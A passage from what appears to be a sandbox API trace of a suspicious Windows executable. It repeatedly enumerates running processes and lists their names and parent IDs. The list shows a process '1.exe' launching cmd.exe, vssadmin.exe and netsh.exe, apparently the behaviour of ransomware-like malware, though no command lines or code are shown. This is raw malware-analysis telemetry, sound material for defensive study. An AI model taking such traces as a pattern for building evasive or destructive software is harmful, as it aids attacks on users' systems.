cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.461] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.462] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.462] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.463] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.464] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0062.464] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.465] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.466] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0062.466] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0062.467] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.468] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0062.468] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0062.469] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0062.470] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0062.471] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0062.471] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0062.472] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0062.473] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0062.473] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0062.667] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0062.670] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0062.671] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0062.672] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0062.674] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0062.679] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0062.680] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0062.681] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0062.681] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0062.682] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0062.683] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0062.683] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0062.684] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0062.685] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0062.685] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0062.686] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0062.687] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0062.687] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0062.688] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0062.689] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0062.689] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0062.690] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0062.691] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0062.692] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0062.693] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0062.694] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0062.695] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0062.696] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0062.696] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0062.697] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0062.698] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0062.699] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0062.700] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0062.700] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0062.701] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0062.702] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.703] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0062.704] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0062.704] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0062.705] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0062.706] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0062.707] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0062.707] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0062.708] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0062.930] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.931] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0062.931] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0062.932] CloseHandle (hObject=0x30c) returned 1 [0062.932] Sleep (dwMilliseconds=0x1f4) [0063.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0063.598] Process32FirstW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.598] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0063.599] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0063.600] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.601] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0063.601] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.602] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0063.603] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0063.603] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0063.604] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.605] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0063.605] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0063.606] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.607] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0063.607] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.608] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, 